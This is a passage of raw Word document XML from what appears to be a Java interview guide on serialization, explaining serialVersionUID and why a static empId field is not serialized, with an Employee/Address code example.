      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> serialVersionUID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1L</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Optional, but good practice to define</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F36434" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E57E121" w14:textId="0A563C68" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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line1</w:t>
      </w:r>
      <w:r w:rsidR="00EB0A68" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C647858" w14:textId="77777777" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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line2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F717F61" w14:textId="04C81DBC" w:rsidR="00F5251C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DBC48" w14:textId="6DBFC7BA" w:rsidR="006F7750" w:rsidRPr="00CE4B95" w:rsidRDefault="006F7750" w:rsidP="00F5251C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3335550E" w14:textId="77777777" w:rsidR="006E0F91" w:rsidRPr="00CE4B95" w:rsidRDefault="006E0F91" w:rsidP="00152B85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F9398F" w14:textId="77777777" w:rsidR="0085166A" w:rsidRPr="00CE4B95" w:rsidRDefault="0085166A" w:rsidP="00152B85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02671027" w14:textId="0E69EEC2" w:rsidR="00152B85" w:rsidRPr="00CE4B95" w:rsidRDefault="00152B85" w:rsidP="00152B85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E34E15" w14:textId="77777777" w:rsidR="00152B85" w:rsidRPr="00CE4B95" w:rsidRDefault="00152B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Implements Serializable:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Both Employee and Address classes implement Serializable, making instances of these classes eligible for serialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19375207" w14:textId="77777777" w:rsidR="00152B85" w:rsidRPr="00CE4B95" w:rsidRDefault="00152B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>serialVersionUID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> It's recommended to include a serialVersionUID for version control. If a class definition changes after objects have been serialized, the serialVersionUID is used to verify that the deserialization process is compatible with the serialized object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A528B37" w14:textId="77777777" w:rsidR="00152B85" w:rsidRPr="00CE4B95" w:rsidRDefault="00152B85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Field Naming Correction:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fixed the typo in the field names (linel to line1 and adress to address).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB3B16B" w14:textId="77777777" w:rsidR="00152B85" w:rsidRPr="00CE4B95" w:rsidRDefault="00152B85" w:rsidP="00152B85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Now both classes are serializable and can be serialized into a byte stream and deserialized back into objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F60680" w14:textId="0E1474AB" w:rsidR="00152B85" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F5251C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="314DBB3A">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FC38FD" w14:textId="12CD8A93" w:rsidR="007C5F31" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE43EF" w:rsidP="00CE1F88">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc196307493"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In above example, what if we have empId as static then what will happen at the time of serialization?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="6B70E209" w14:textId="2EC28330" w:rsidR="00AE43EF" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE43EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If empId is declared as static in the Employee class, it will </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not be serialized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during the serialization process. This is because static fields are associated with the class itself, not with instances of the class, and serialization in Java only deals with instance data (non-static fields).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649C6442" w14:textId="77777777" w:rsidR="00AE43EF" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE43EF" w:rsidP="00AE43EF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Here's what will happen when empId is static:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398B9DC" w14:textId="7F6A4258" w:rsidR="00AE43EF" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36" w:rsidP="00F5251C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7215CDE4"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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io</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Serializable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49888A8E"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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> java</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util</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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163844A0"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00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AD7C34"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6666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258294B5"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Employe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mplement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erializabl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1D8FB7FA"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stat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final</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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> serialVersionUID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1L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91AB97"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00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48709B6B"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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2307305D"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empld</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D7271D"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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dob</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0480BE"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Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CBC081"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48A4F9A4"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Static field (will not be serialized)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09EE2D"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stat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empId</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2403403E"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2BC442CC"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Employee</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nam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empld</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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dob</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Address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> addres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empId</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23434F66"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thi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nam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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6849B3E0"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thi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empld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empld</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E867E93"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thi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dob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dob</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B2C450"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thi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address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address</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D221518"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Employe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empId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empId</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F900000"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325CE860"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666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B85B0"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color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4638C9" w14:textId="77777777" w:rsidR="00BA6632" w:rsidRPr="00CE4B95" w:rsidRDefault="00BA66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p>
    <w:p w14:paraId="39549079"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6666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C373C22"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Addre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mplement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erializabl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6E0ADDCF"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stat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final</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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> serialVersionUID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1L</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC38F9"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4E527C27"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line1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D71B9E3" w14:textId="77777777"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line2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C77675" w14:textId="3A7DDB15" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4474EDDB" w14:textId="77777777" w:rsidR="00AE43EF" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE43EF" w:rsidP="00F5251C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17113A31" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36" w:rsidP="00EB4E36">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What happens during serialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF22B84" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The instance fields (name, empld, dob, address) of the Employee class will be serialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C25E6" w14:textId="77777777" w:rsidR="00EB4E36" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB4E36">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The static field (empId) will </w:t>
      </w:r>
